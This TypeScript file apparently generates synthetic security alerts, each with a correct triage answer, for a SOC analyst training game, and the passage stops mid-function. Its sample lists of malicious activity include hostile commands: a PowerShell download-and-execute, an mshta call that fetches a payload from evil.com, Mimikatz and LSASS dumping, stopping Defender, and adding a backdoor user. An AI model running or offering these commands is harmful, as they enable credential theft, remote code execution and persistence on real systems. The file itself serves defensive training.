import type {
  Action,
  Alert,
  AlertCategory,
  AlertContext,
  AssetRole,
  AttackChainDefinition,
  Difficulty,
  Severity,
  SourceType,
} from './types';

export interface SeededRandom {
  next(): number;
  nextInt(min: number, max: number): number;
  pick<T>(arr: T[]): T;
  sample<T>(arr: T[], count: number): T[];
  chance(probability: number): boolean;
}

export function createSeededRandom(seed: number): SeededRandom {
  let state = seed;
  const next = () => {
    state = (state * 1103515245 + 12345) & 0x7fffffff;
    return state / 0x7fffffff;
  };
  return {
    next,
    nextInt: (min, max) => Math.floor(next() * (max - min + 1)) + min,
    pick: (arr) => arr[Math.floor(next() * arr.length)],
    sample: (arr, count) => {
      const shuffled = [...arr].sort(() => next() - 0.5);
      return shuffled.slice(0, count);
    },
    chance: (p) => next() < p,
  };
}

const SCANNER_IPS = [
  '45.33.32.156',
  '185.220.101.33',
  '89.248.167.131',
  '193.32.162.159',
];
const TOR_IPS = ['185.220.100.252', '185.220.101.1', '23.129.64.213'];
const CLOUD_IPS = ['52.94.76.12', '35.192.45.67', '104.196.33.12', '13.92.155.23'];
const INTERNAL_IPS = ['10.0.1.45', '10.0.2.112', '192.168.1.50', '172.16.0.88'];

const HOSTNAMES: Record<AssetRole, string[]> = {
  web: ['prod-web-01', 'prod-web-02', 'staging-web', 'api-gateway-01'],
  db: ['prod-db-master', 'prod-db-replica', 'analytics-db', 'redis-cache-01'],
  admin: ['admin-portal', 'mgmt-console', 'bastion-01', 'jenkins-ci'],
  honeypot: ['honeypot-ssh', 'decoy-web', 'canary-db'],
  workstation: ['ws-jsmith', 'ws-mjones', 'ws-admin01', 'laptop-ceo'],
  jumpbox: ['jumpbox-prod', 'bastion-east', 'vpn-gateway'],
  backup: ['backup-server-01', 'dr-sync', 'vault-backup'],
};

const USERNAMES = [
  'root',
  'admin',
  'ubuntu',
  'deploy',
  'jenkins',
  'backup',
  'git',
  'www-data',
];
const ADMIN_USERS = ['jsmith', 'mjones', 'admin01', 'svc-deploy', 'svc-monitoring'];
const GEOS = [
  'Russia',
  'China',
  'United States',
  'Germany',
  'Netherlands',
  'Brazil',
  'Unknown',
];
const C2_DOMAINS = [
  'update-service.xyz',
  'cdn-static.top',
  'api-analytics.info',
  'sync-cloud.biz',
];

export interface AlertTemplate {
  id: string;
  title: string;
  category: AlertCategory;
  generate: (
    rng: SeededRandom,
    difficulty: Difficulty,
    contextOverrides?: Partial<AlertContext>
  ) => Partial<Alert> & {
    correctAction: Action;
    isTruePositive: boolean;
  };
}

function generateSourceContext(
  rng: SeededRandom,
  type?: SourceType
): AlertContext['source'] {
  const sourceType =
    type ?? rng.pick<SourceType>(['scanner', 'tor', 'residential', 'cloud', 'internal']);

  let ip: string;
  let isKnownBad = false;
  let isKnownGood = false;
  let threatIntel: string | undefined;
  let geo: string | undefined;

  switch (sourceType) {
    case 'scanner':
      ip = rng.pick(SCANNER_IPS);
      isKnownBad = true;
      threatIntel = 'Shodan/Censys known scanner';
      geo = rng.pick(['Netherlands', 'Germany', 'United States']);
      break;
    case 'tor':
      ip = rng.pick(TOR_IPS);
      isKnownBad = true;
      threatIntel = 'Tor exit node';
      geo = 'Unknown (Tor)';
      break;
    case 'cloud':
      ip = rng.pick(CLOUD_IPS);
      geo = 'United States';
      break;
    case 'internal':
      ip = rng.pick(INTERNAL_IPS);
      isKnownGood = true;
      break;
    default:
      ip = `${rng.nextInt(1, 223)}.${rng.nextInt(0, 255)}.${rng.nextInt(0, 255)}.${rng.nextInt(1, 254)}`;
      geo = rng.pick(GEOS);
  }

  return { ip, type: sourceType, geo, threatIntel, isKnownBad, isKnownGood };
}

function generateTargetContext(
  rng: SeededRandom,
  role?: AssetRole
): AlertContext['target'] {
  const assetRole = role ?? rng.pick<AssetRole>(['web', 'db', 'admin', 'workstation']);
  const hostname = rng.pick(HOSTNAMES[assetRole]);
  const criticality =
    assetRole === 'db' || assetRole === 'admin'
      ? rng.pick<'high' | 'critical'>(['high', 'critical'])
      : rng.pick<'low' | 'medium' | 'high'>(['low', 'medium', 'high']);

  return {
    hostname,
    ip: `10.0.${rng.nextInt(1, 10)}.${rng.nextInt(1, 254)}`,
    role: assetRole,
    owner: rng.pick(['Platform Team', 'Security', 'DevOps', 'Engineering', 'IT']),
    criticality,
    isPublic: assetRole === 'web' || (assetRole === 'admin' && rng.chance(0.2)),
  };
}

function formatTime(offsetMinutes: number): string {
  const now = new Date();
  now.setMinutes(now.getMinutes() - offsetMinutes);
  return now.toISOString().replace('T', ' ').slice(0, 19) + ' UTC';
}

export const ALERT_TEMPLATES: AlertTemplate[] = [
  // SSH Brute Force
  {
    id: 'ssh-brute-force',
    title: 'Failed SSH login (brute force pattern)',
    category: 'brute-force',
    generate: (rng, difficulty) => {
      const source = generateSourceContext(
        rng,
        rng.pick<SourceType>(['scanner', 'tor', 'cloud', 'residential'])
      );
      const target = generateTargetContext(
        rng,
        rng.pick<AssetRole>(['web', 'admin', 'jumpbox', 'honeypot'])
      );
      const attemptCount = rng.nextInt(20, 500);
      const users = rng.sample(USERNAMES, rng.nextInt(2, 5));
      const hasSuccess = rng.chance(difficulty === 'intern' ? 0.1 : 0.25);
      const successUser = hasSuccess ? rng.pick(users) : undefined;

      const isTruePositive =
        hasSuccess || (source.isKnownBad && target.role !== 'honeypot');
      const isHoneypot = target.role === 'honeypot';

      let correctAction: Action;
      let explanation: string;

      if (hasSuccess) {
        correctAction = 'escalate';
        explanation = `Brute force succeeded - user "${successUser}" authenticated after ${attemptCount} failed attempts. Immediate response required.`;
      } else if (isHoneypot) {
        correctAction = 'dismiss';
        explanation = `Target is a honeypot (${target.hostname}). This is expected behavior - honeypots exist to attract scanners.`;
      } else if (source.isKnownBad && !hasSuccess) {
        correctAction = difficulty === 'senior' ? 'tune' : 'dismiss';
        explanation = source.threatIntel
          ? `Source (${source.ip}) is a ${source.threatIntel}. Failed attempts with no success against hardened target - routine noise.`
          : `Known scanner IP with no successful auth. Can be tuned out if recurring.`;
      } else {
        correctAction = 'dismiss';
        explanation = `No successful authentication. Standard brute force attempt blocked by rate limiting.`;
      }

      return {
        severity: hasSuccess
          ? 'CRITICAL'
          : ((attemptCount > 100 ? 'MEDIUM' : 'LOW') as Severity),
        summary: `${attemptCount} failed SSH login attempts from ${source.ip}${hasSuccess ? ' - ONE SUCCESSFUL LOGIN' : ''}`,
        details: {
          'Attempt count': attemptCount,
          'Usernames tried': users,
          'Time window': `${rng.nextInt(1, 5)} minutes`,
          'Successful auth': hasSuccess ? `Yes (${successUser})` : 'No',
        },
        context: {
          source,
          target,
          relatedAlerts: [],
          baselineNote:
            target.role === 'web'
              ? 'This host sees ~50 failed SSH attempts daily from scanners'
              : undefined,
          threatIntelNote: source.threatIntel,
        },
        correctAction,
        explanation,
        isTruePositive,
        mitreTechnique: 'T1110.001 - Brute Force: Password Guessing',
      };
    },
  },

  // Malware Beacon
  {
    id: 'malware-beacon',
    title: 'Suspicious outbound connection pattern',
    category: 'malware',
    generate: (rng, difficulty) => {
      const target = generateTargetContext(
        rng,
        rng.pick<AssetRole>(['workstation', 'web', 'admin'])
      );
      const isRealMalware = rng.chance(difficulty === 'intern' ? 0.7 : 0.4);
      const interval = isRealMalware ? rng.nextInt(55, 65) : rng.nextInt(1, 1800);
      const domain = isRealMalware
        ? rng.pick(C2_DOMAINS)
        : rng.pick([
            'updates.microsoft.com',
            'api.github.com',
            'telemetry.app.local',
            'ntp.ubuntu.com',
          ]);
      const connectionCount = rng.nextInt(10, 50);

      const isKnownService = ['microsoft.com', 'github.com', 'ubuntu.com'].some((d) =>
        domain.includes(d)
      );
      const isRegularInterval = Math.abs(interval - 60) < 10;

      let correctAction: Action;
      let explanation: string;

      if (isRealMalware) {
        correctAction = 'escalate';
        explanation = `Regular ~60 second beacon interval to suspicious domain (${domain}) is classic C2 behavior. Requires immediate isolation and investigation.`;
      } else if (isKnownService) {
        correctAction = 'tune';
        explanation = `Connections to ${domain} are legitimate service traffic. Tune to reduce noise from known-good destinations.`;
      } else if (isRegularInterval && !isKnownService) {
        correctAction = 'investigate';
        explanation = `Regular interval but to internal/known service. Worth investigating to confirm it's expected telemetry.`;
      } else {
        correctAction = 'dismiss';
        explanation = `Irregular connection pattern to known service - normal application behavior.`;
      }

      return {
        severity: isRealMalware ? 'HIGH' : ('LOW' as Severity),
        summary: `Host ${target.hostname} making periodic connections to ${domain}`,
        details: {
          Destination: domain,
          'Connection count': connectionCount,
          'Average interval': `${interval} seconds`,
          Protocol: 'HTTPS (443)',
          'Data transferred': `${rng.nextInt(1, 50)} KB per connection`,
        },
        context: {
          source: {
            ip: target.ip,
            type: 'internal',
            isKnownBad: false,
            isKnownGood: true,
          },
          target: {
            ...target,
            hostname: domain,
            ip: rng.pick(CLOUD_IPS),
            isPublic: true,
          },
          relatedAlerts: [],
          baselineNote: isKnownService
            ? `${domain} is on the approved external services list`
            : undefined,
          threatIntelNote: isRealMalware
            ? `Domain ${domain} flagged by 3 threat feeds as C2 infrastructure`
            : undefined,
        },
        correctAction,
        explanation,
        isTruePositive: isRealMalware,
        mitreTechnique: 'T1071.001 - Application Layer Protocol: Web Protocols',
      };
    },
  },

  // Data Exfiltration
  {
    id: 'data-exfil',
    title: 'Large outbound data transfer',
    category: 'data-exfil',
    generate: (rng, difficulty) => {
      const target = generateTargetContext(
        rng,
        rng.pick<AssetRole>(['db', 'workstation', 'backup'])
      );
      const isRealExfil = rng.chance(difficulty === 'intern' ? 0.6 : 0.35);
      const dataSizeMB = rng.nextInt(100, 5000);
      const destination = isRealExfil
        ? rng.pick(['185.156.73.22', '91.240.118.45', `ftp.${rng.pick(C2_DOMAINS)}`])
        : rng.pick([
            's3.amazonaws.com',
            'backup.company.com',
            'dr-site.internal',
            'cloud-backup.azure.com',
          ]);
      const isBackupTime = rng.chance(0.4);
      const hour = isBackupTime ? rng.nextInt(1, 5) : rng.nextInt(9, 17);

      const isKnownBackupDest =
        destination.includes('backup') ||
        destination.includes('s3') ||
        destination.includes('azure');

      let correctAction: Action;
      let explanation: string;

      if (isRealExfil) {
        correctAction = 'escalate';
        explanation = `${dataSizeMB}MB transferred to unknown external IP (${destination}). No backup job scheduled. Possible data exfiltration.`;
      } else if (isKnownBackupDest && isBackupTime) {
        correctAction = 'tune';
        explanation = `Transfer to ${destination} during backup window (${hour}:00). This matches scheduled backup job - tune to prevent recurring alerts.`;
      } else if (isKnownBackupDest) {
        correctAction = 'dismiss';
        explanation = `Large transfer to known backup destination. Timing is unusual but destination is approved.`;
      } else {
        correctAction = 'investigate';
        explanation = `Large transfer to unfamiliar destination. Worth verifying this is an approved service before dismissing.`;
      }

      return {
        severity: isRealExfil
          ? 'CRITICAL'
          : ((dataSizeMB > 1000 ? 'MEDIUM' : 'LOW') as Severity),
        summary: `${dataSizeMB}MB transferred from ${target.hostname} to ${destination}`,
        details: {
          'Data size': `${dataSizeMB} MB`,
          Destination: destination,
          Protocol: rng.pick(['HTTPS', 'FTP', 'SCP']),
          Duration: `${rng.nextInt(5, 60)} minutes`,
          Time: `${hour}:${rng.nextInt(0, 59).toString().padStart(2, '0')} UTC`,
        },
        context: {
          source: {
            ip: target.ip,
            type: 'internal',
            isKnownBad: false,
            isKnownGood: true,
          },
          target: {
            hostname: destination,
            ip: isRealExfil ? destination : rng.pick(CLOUD_IPS),
            role: 'backup',
            criticality: 'low',
            isPublic: true,
          },
          relatedAlerts: [],
          baselineNote: isKnownBackupDest
            ? `Scheduled backup runs daily at 2:00 UTC to ${destination}`
            : undefined,
          threatIntelNote: isRealExfil
            ? `Destination IP associated with bulletproof hosting`
            : undefined,
        },
        correctAction,
        explanation,
        isTruePositive: isRealExfil,
        mitreTechnique: 'T1041 - Exfiltration Over C2 Channel',
      };
    },
  },

  // Privilege Escalation
  {
    id: 'priv-esc',
    title: 'Privilege escalation detected',
    category: 'privilege-escalation',
    generate: (rng, difficulty) => {
      const target = generateTargetContext(
        rng,
        rng.pick<AssetRole>(['workstation', 'web', 'admin'])
      );
      const isRealAttack = rng.chance(difficulty === 'intern' ? 0.6 : 0.4);
      const user = rng.pick(ADMIN_USERS);
      const method = isRealAttack
        ? rng.pick([
            'sudo CVE-2021-4034',
            'kernel exploit',
            'SUID binary abuse',
            'sudo -i after ssh',
          ])
        : rng.pick([
            'sudo -i (authorized)',
            'su to service account',
            'scheduled admin task',
          ]);
      const previousActivity = isRealAttack
        ? rng.pick([
            'SSH from unusual IP 5 min ago',
            'Failed logins 10 min ago',
            'Port scan from same host',
          ])
        : rng.pick([
            'Normal login from office IP',
            'Routine maintenance window',
            'Change ticket #12345',
          ]);

      let correctAction: Action;
      let explanation: string;

      if (isRealAttack) {
        correctAction = 'escalate';
        explanation = `Privilege escalation via "${method}" following suspicious activity (${previousActivity}). Attack chain in progress.`;
      } else if (
        previousActivity.includes('ticket') ||
        previousActivity.includes('maintenance')
      ) {
        correctAction = 'dismiss';
        explanation = `Authorized admin activity with change ticket reference. Expected privilege use during maintenance.`;
      } else {
        correctAction = 'investigate';
        explanation = `Legitimate method but verify the user intended this action. Check with ${user} if unexpected.`;
      }

      return {
        severity: isRealAttack ? 'CRITICAL' : ('MEDIUM' as Severity),
        summary: `User ${user} escalated to root on ${target.hostname} via ${method.split(' ')[0]}`,
        details: {
          User: user,
          Method: method,
          Target: 'root',
          Host: target.hostname,
          'Previous activity': previousActivity,
        },
        context: {
          source: {
            ip: target.ip,
            type: 'internal',
            isKnownBad: false,
            isKnownGood: !isRealAttack,
          },
          target,
          relatedAlerts: isRealAttack
            ? [
                {
                  id: 'rel-1',
                  title: previousActivity,
                  time: formatTime(rng.nextInt(5, 15)),
                  severity: 'MEDIUM',
                },
              ]
            : [],
          baselineNote: !isRealAttack
            ? `${user} has authorized sudo access per IAM policy`
            : undefined,
          ticketReference:
            !isRealAttack && previousActivity.includes('ticket')
              ? 'CHG-12345'
              : undefined,
        },
        correctAction,
        explanation,
        isTruePositive: isRealAttack,
        mitreTechnique: 'T1068 - Exploitation for Privilege Escalation',
      };
    },
  },

  // Vulnerability Scan
  {
    id: 'vuln-scan',
    title: 'Vulnerability scan detected',
    category: 'reconnaissance',
    generate: (rng, _difficulty) => {
      const isInternal = rng.chance(0.6);
      const source = isInternal
        ? {
            ip: rng.pick(['10.0.5.10', '10.0.5.11']),
            type: 'internal' as SourceType,
            isKnownBad: false,
            isKnownGood: true,
            hostname: 'vuln-scanner-01',
          }
        : generateSourceContext(rng, 'scanner');
      const target = generateTargetContext(rng, 'web');
      const scanType = rng.pick(['Nessus', 'Qualys', 'OpenVAS', 'Nuclei', 'Unknown']);
      const hasTicket = isInternal && rng.chance(0.8);

      let correctAction: Action;
      let explanation: string;

      if (isInternal && hasTicket) {
        correctAction = 'tune';
        explanation = `Internal vulnerability scan from security team scanner (${source.hostname}). Has scheduled scan ticket - tune to suppress during scan windows.`;
      } else if (isInternal) {
        correctAction = 'dismiss';
        explanation = `Internal scanner IP. Verify with security team if unexpected, but likely routine scan.`;
      } else {
        correctAction = 'dismiss';
        explanation = `External scanner (${source.threatIntel || 'unknown'}). Common internet noise against public-facing hosts.`;
      }

      return {
        severity: 'LOW' as Severity,
        summary: `${scanType} vulnerability scan against ${target.hostname} from ${source.ip}`,
        details: {
          'Scanner type': scanType,
          Requests: rng.nextInt(500, 5000),
          Duration: `${rng.nextInt(10, 60)} minutes`,
          'Ports scanned': rng.pick(['All', 'Top 1000', '22,80,443,8080']),
        },
        context: {
          source,
          target,
          relatedAlerts: [],
          baselineNote: isInternal
            ? 'Weekly vulnerability scans run Tuesday 2-4 AM UTC'
            : 'Public hosts receive ~10 external scans daily',
          ticketReference: hasTicket ? 'SCAN-' + rng.nextInt(1000, 9999) : undefined,
        },
        correctAction,
        explanation,
        isTruePositive: false,
        mitreTechnique: 'T1595.002 - Active Scanning: Vulnerability Scanning',
      };
    },
  },

  // Failed Login (single user)
  {
    id: 'failed-login',
    title: 'Multiple failed login attempts',
    category: 'brute-force',
    generate: (rng, difficulty) => {
      const target = generateTargetContext(
        rng,
        rng.pick<AssetRole>(['web', 'admin', 'workstation'])
      );
      const isSuspicious = rng.chance(difficulty === 'intern' ? 0.4 : 0.25);
      const user = rng.pick(ADMIN_USERS);
      const attemptCount = rng.nextInt(3, 15);
      const sourceType = isSuspicious
        ? rng.pick<SourceType>(['tor', 'cloud', 'residential'])
        : 'internal';
      const source = generateSourceContext(rng, sourceType);
      const eventualSuccess = !isSuspicious && rng.chance(0.7);

      let correctAction: Action;
      let explanation: string;

      if (isSuspicious && !eventualSuccess) {
        correctAction = 'investigate';
        explanation = `Failed logins from unusual location (${source.geo}). Verify with ${user} if this was them - could be credential stuffing or user traveling.`;
      } else if (eventualSuccess) {
        correctAction = 'dismiss';
        explanation = `User ${user} eventually logged in successfully - likely forgot password or typo. Normal user behavior.`;
      } else if (attemptCount > 10) {
        correctAction = 'investigate';
        explanation = `High number of failures (${attemptCount}) warrants checking if account should be locked.`;
      } else {
        correctAction = 'dismiss';
        explanation = `Small number of failed attempts from expected location. User likely mistyped password.`;
      }

      return {
        severity: (isSuspicious ? 'MEDIUM' : 'LOW') as Severity,
        summary: `${attemptCount} failed logins for ${user} from ${source.ip}${eventualSuccess ? ' (then succeeded)' : ''}`,
        details: {
          User: user,
          'Attempt count': attemptCount,
          'Source IP': source.ip,
          Location: source.geo || 'Internal',
          'Eventual success': eventualSuccess ? 'Yes' : 'No',
        },
        context: {
          source,
          target,
          relatedAlerts: [],
          baselineNote: `${user} typically logs in from office (10.0.x.x) or VPN`,
        },
        correctAction,
        explanation,
        isTruePositive: isSuspicious && !eventualSuccess,
        mitreTechnique: 'T1110 - Brute Force',
      };
    },
  },

  // PowerShell Execution
  {
    id: 'powershell-exec',
    title: 'Suspicious PowerShell execution',
    category: 'lateral-movement',
    generate: (rng, difficulty) => {
      const target = generateTargetContext(
        rng,
        rng.pick<AssetRole>(['workstation', 'admin'])
      );
      const isMalicious = rng.chance(difficulty === 'intern' ? 0.6 : 0.4);
      const user = rng.pick(ADMIN_USERS);

      const maliciousCommands = [
        'IEX (New-Object Net.WebClient).DownloadString(...)',
        'powershell -enc <base64>',
        'Invoke-Mimikatz',
        'Get-Process | Where-Object { $_.Name -eq "MsMpEng" } | Stop-Process',
      ];
      const benignCommands = [
        'Get-ADUser -Filter *',
        'Install-Module AzureAD',
        'Get-Service | Where-Object {$_.Status -eq "Stopped"}',
        'Set-ExecutionPolicy RemoteSigned',
      ];

      const command = isMalicious
        ? rng.pick(maliciousCommands)
        : rng.pick(benignCommands);
      const isEncoded = command.includes('-enc') || command.includes('base64');
      const isDownload =
        command.includes('DownloadString') || command.includes('WebClient');

      let correctAction: Action;
      let explanation: string;

      if (isMalicious) {
        correctAction = 'escalate';
        const reason = isDownload
          ? 'Downloads and executes remote code'
          : isEncoded
            ? 'Base64 encoded command (obfuscation technique)'
            : 'Known malicious tool/technique';
        explanation = `${reason}. Classic attack pattern - requires immediate investigation.`;
      } else if (command.includes('AzureAD') || command.includes('ADUser')) {
        correctAction = 'dismiss';
        explanation = `Standard admin PowerShell for AD/Azure management. ${user} is authorized for these operations.`;
      } else {
        correctAction = 'investigate';
        explanation = `PowerShell usage by ${user} - verify this matches their normal administrative tasks.`;
      }

      return {
        severity: (isMalicious ? 'HIGH' : 'LOW') as Severity,
        summary: `PowerShell command executed by ${user} on ${target.hostname}`,
        details: {
          User: user,
          Command: command.length > 50 ? command.slice(0, 50) + '...' : command,
          Encoded: isEncoded ? 'Yes' : 'No',
          'Network activity': isDownload ? 'Yes' : 'No',
        },
        context: {
          source: {
            ip: target.ip,
            type: 'internal',
            isKnownBad: false,
            isKnownGood: !isMalicious,
          },
          target,
          relatedAlerts: isMalicious
            ? [
                {
                  id: 'rel-ps',
                  title: 'Defender AV disabled',
                  time: formatTime(2),
                  severity: 'HIGH',
                },
              ]
            : [],
          baselineNote: !isMalicious
            ? `${user} runs PowerShell scripts for IT automation`
            : undefined,
        },
        correctAction,
        explanation,
        isTruePositive: isMalicious,
        mitreTechnique: 'T1059.001 - Command and Scripting Interpreter: PowerShell',
      };
    },
  },

  // Internal Port Scan
  {
    id: 'internal-scan',
    title: 'Internal port scanning activity',
    category: 'reconnaissance',
    generate: (rng, difficulty) => {
      const source = generateSourceContext(rng, 'internal');
      const isMalicious = rng.chance(difficulty === 'intern' ? 0.5 : 0.35);
      const portsScanned = rng.nextInt(50, 500);
      const hostsScanned = rng.nextInt(5, 50);
      const scanner = isMalicious
        ? rng.pick(['nmap', 'masscan', 'unknown binary'])
        : rng.pick(['nmap (IT asset discovery)', 'Qualys agent', 'SCCM client']);

      let correctAction: Action;
      let explanation: string;

      if (isMalicious) {
        correctAction = 'escalate';
        explanation = `Internal host scanning ${hostsScanned} systems - likely lateral movement reconnaissance after initial compromise. Check source host for indicators.`;
      } else if (
        scanner.includes('IT') ||
        scanner.includes('Qualys') ||
        scanner.includes('SCCM')
      ) {
        correctAction = 'tune';
        explanation = `IT asset discovery or authorized security tool. Tune to suppress alerts from known scanner hosts.`;
      } else {
        correctAction = 'investigate';
        explanation = `Port scanning from internal host - verify with host owner if this is authorized activity.`;
      }

      return {
        severity: (isMalicious ? 'HIGH' : 'MEDIUM') as Severity,
        summary: `${source.ip} scanned ${portsScanned} ports across ${hostsScanned} internal hosts`,
        details: {
          Source: source.ip,
          'Hosts scanned': hostsScanned,
          'Ports per host': Math.round(portsScanned / hostsScanned),
          Scanner: scanner,
          Duration: `${rng.nextInt(5, 30)} minutes`,
        },
        context: {
          source,
          target: generateTargetContext(rng, 'web'),
          relatedAlerts: isMalicious
            ? [
                {
                  id: 'rel-scan',
                  title: 'Unusual process on source host',
                  time: formatTime(20),
                  severity: 'MEDIUM',
                },
              ]
            : [],
          baselineNote: !isMalicious
            ? 'IT runs weekly asset discovery scans from 10.0.5.x subnet'
            : undefined,
        },
        correctAction,
        explanation,
        isTruePositive: isMalicious,
        mitreTechnique: 'T1046 - Network Service Discovery',
      };
    },
  },

  // DNS Tunneling
  {
    id: 'dns-tunneling',
    title: 'Anomalous DNS query pattern',
    category: 'data-exfil',
    generate: (rng, difficulty) => {
      const target = generateTargetContext(
        rng,
        rng.pick<AssetRole>(['workstation', 'web'])
      );
      const isMalicious = rng.chance(difficulty === 'intern' ? 0.65 : 0.4);
      const queryCount = rng.nextInt(500, 5000);
      const avgLength = isMalicious ? rng.nextInt(45, 63) : rng.nextInt(15, 30);

      const maliciousDomains = ['d4t4.xyz', 'sync-cdn.top', 'update-api.info'];
      const benignDomains = [
        'google.com',
        'cloudflare.com',
        'akamai.net',
        'microsoft.com',
      ];
      const domain = isMalicious ? rng.pick(maliciousDomains) : rng.pick(benignDomains);

      const subdomainPattern = isMalicious
        ? 'Long, random-looking subdomains (base64/hex encoded)'
        : 'Standard subdomain patterns';

      let correctAction: Action;
      let explanation: string;

      if (isMalicious) {
        correctAction = 'escalate';
        explanation = `High volume of DNS queries with long, encoded subdomains to suspicious domain - classic DNS tunneling for data exfiltration or C2.`;
      } else if (queryCount > 2000) {
        correctAction = 'investigate';
        explanation = `High DNS volume but to known-good domain. Could be misconfigured software or overly chatty application.`;
      } else {
        correctAction = 'dismiss';
        explanation = `Normal DNS traffic patterns to legitimate CDN/service provider.`;
      }

      return {
        severity: isMalicious ? 'HIGH' : ('LOW' as Severity),
        summary: `${queryCount} DNS queries from ${target.hostname} to *.${domain}`,
        details: {
          'Query count': queryCount,
          'Parent domain': domain,
          'Avg subdomain length': `${avgLength} chars`,
          'Query types': 'TXT, CNAME, A',
          'Subdomain pattern': subdomainPattern,
          'Time window': `${rng.nextInt(5, 30)} minutes`,
        },
        context: {
          source: {
            ip: target.ip,
            type: 'internal',
            isKnownBad: false,
            isKnownGood: !isMalicious,
          },
          target,
          relatedAlerts: [],
          baselineNote: !isMalicious
            ? `${domain} is a legitimate CDN provider`
            : undefined,
          threatIntelNote: isMalicious
            ? `Domain ${domain} registered 3 days ago, no legitimate services`
            : undefined,
        },
        correctAction,
        explanation,
        isTruePositive: isMalicious,
        mitreTechnique: 'T1071.004 - Application Layer Protocol: DNS',
      };
    },
  },

  // Credential Dumping (Mimikatz-style)
  {
    id: 'credential-dump',
    title: 'Credential dumping attempt detected',
    category: 'lateral-movement',
    generate: (rng, difficulty) => {
      const target = generateTargetContext(
        rng,
        rng.pick<AssetRole>(['workstation', 'admin'])
      );
      const isMalicious = rng.chance(difficulty === 'intern' ? 0.7 : 0.5);
      const user = rng.pick(ADMIN_USERS);

      const maliciousTools = [
        'mimikatz.exe',
        'procdump.exe -ma lsass.exe',
        'sekurlsa::logonpasswords',
        'comsvcs.dll MiniDump',
      ];
      const benignTools = [
        'Windows Credential Manager access',
        'LSASS normal operation',
        'Password manager sync',
      ];

      const tool = isMalicious ? rng.pick(maliciousTools) : rng.pick(benignTools);
      const lsassAccess = isMalicious || rng.chance(0.3);

      let correctAction: Action;
      let explanation: string;

      if (isMalicious) {
        correctAction = 'escalate';
        const toolName = tool.includes('mimikatz')
          ? 'Mimikatz'
          : tool.includes('procdump')
            ? 'procdump targeting LSASS'
            : 'credential dumping tool';
        explanation = `${toolName} detected - attacker is harvesting credentials for lateral movement. Immediate containment required.`;
      } else if (lsassAccess) {
        correctAction = 'investigate';
        explanation = `LSASS access from legitimate process but verify this is expected behavior.`;
      } else {
        correctAction = 'dismiss';
        explanation = `Normal credential manager access - password managers and Windows auth regularly access these APIs.`;
      }

      return {
        severity: isMalicious ? 'CRITICAL' : ('MEDIUM' as Severity),
        summary: `Credential access detected on ${target.hostname} by ${user}`,
        details: {
          'Process/Tool': tool,
          User: user,
          'LSASS access': lsassAccess ? 'Yes' : 'No',
          'Memory dump': isMalicious ? 'Attempted' : 'No',
        },
        context: {
          source: {
            ip: target.ip,
            type: 'internal',
            isKnownBad: isMalicious,
            isKnownGood: !isMalicious,
          },
          target,
          relatedAlerts: isMalicious
            ? [
                {
                  id: 'rel-cred',
                  title: 'Defender tamper alert',
                  time: formatTime(5),
                  severity: 'HIGH',
                },
              ]
            : [],
          baselineNote: !isMalicious
            ? `Password managers may trigger LSASS access alerts`
            : undefined,
          threatIntelNote: isMalicious
            ? `Known credential theft technique used by APT groups`
            : undefined,
        },
        correctAction,
        explanation,
        isTruePositive: isMalicious,
        mitreTechnique: 'T1003.001 - OS Credential Dumping: LSASS Memory',
      };
    },
  },

  // Persistence - Scheduled Task
  {
    id: 'persistence-schtask',
    title: 'Scheduled task created',
    category: 'lateral-movement',
    generate: (rng, difficulty) => {
      const target = generateTargetContext(
        rng,
        rng.pick<AssetRole>(['workstation', 'web', 'admin'])
      );
      const isMalicious = rng.chance(difficulty === 'intern' ? 0.6 : 0.4);
      const user = rng.pick(ADMIN_USERS);

      const maliciousTasks = [
        { name: 'WindowsUpdate', cmd: 'powershell -enc <base64>', trigger: 'At logon' },
        {
          name: 'SystemHealthCheck',
          cmd: 'C:\\Users\\Public\\svc.exe',
          trigger: 'Every 15 min',
        },
        {
          name: 'ChromeUpdate',
          cmd: 'mshta http://evil.com/payload.hta',
          trigger: 'At startup',
        },
      ];
      const benignTasks = [
        {
          name: 'BackupJob',
          cmd: 'C:\\Program Files\\Backup\\backup.exe',
          trigger: 'Daily 2:00 AM',
        },
        { name: 'CCMExec', cmd: 'SCCM client task', trigger: 'Every 4 hours' },
        { name: 'WindowsDefenderScan', cmd: 'MpCmdRun.exe -Scan', trigger: 'Weekly' },
      ];

      const task = isMalicious ? rng.pick(maliciousTasks) : rng.pick(benignTasks);

      let correctAction: Action;
      let explanation: string;

      if (isMalicious) {
        correctAction = 'escalate';
        explanation = `Suspicious scheduled task "${task.name}" - ${task.cmd.includes('powershell') ? 'encoded PowerShell' : task.cmd.includes('mshta') ? 'mshta remote execution' : 'unusual executable path'}. Classic persistence mechanism.`;
      } else if (task.name.includes('SCCM') || task.name.includes('Defender')) {
        correctAction = 'tune';
        explanation = `Known management/security tool creating scheduled tasks. Tune to reduce noise from legitimate IT automation.`;
      } else {
        correctAction = 'dismiss';
        explanation = `Scheduled task in standard Program Files location with legitimate-looking purpose.`;
      }

      return {
        severity: isMalicious ? 'HIGH' : ('LOW' as Severity),
        summary: `New scheduled task "${task.name}" created on ${target.hostname}`,
        details: {
          'Task name': task.name,
          Command: task.cmd,
          Trigger: task.trigger,
          'Created by': user,
          'Run as': isMalicious ? 'SYSTEM' : 'LOCAL SERVICE',
        },
        context: {
          source: {
            ip: target.ip,
            type: 'internal',
            isKnownBad: false,
            isKnownGood: !isMalicious,
          },
          target,
          relatedAlerts: isMalicious
            ? [
                {
                  id: 'rel-persist',
                  title: 'Suspicious process execution',
                  time: formatTime(10),
                  severity: 'MEDIUM',
                },
              ]
            : [],
          baselineNote: !isMalicious
            ? `IT automation creates scheduled tasks for maintenance`
            : undefined,
        },
        correctAction,
        explanation,
        isTruePositive: isMalicious,
        mitreTechnique: 'T1053.005 - Scheduled Task/Job: Scheduled Task',
      };
    },
  },

  // Lateral Movement - PsExec/WMI
  {
    id: 'lateral-psexec',
    title: 'Remote execution detected',
    category: 'lateral-movement',
    generate: (rng, difficulty) => {
      const source = generateSourceContext(rng, 'internal');
      const target = generateTargetContext(
        rng,
        rng.pick<AssetRole>(['workstation', 'admin', 'db'])
      );
      const isMalicious = rng.chance(difficulty === 'intern' ? 0.6 : 0.45);
      const user = rng.pick(ADMIN_USERS);

      const method = rng.pick(['PsExec', 'WMI', 'WinRM', 'SMB admin share']);
      const command = isMalicious
        ? rng.pick([
            'cmd.exe /c whoami',
            'powershell -nop -w hidden -enc',
            'net user backdoor P@ss /add',
          ])
        : rng.pick(['gpupdate /force', 'Get-Service', 'Invoke-Command {Get-Process}']);

      const isFromJumpbox = source.ip.includes('10.0.5') || rng.chance(0.3);

      let correctAction: Action;
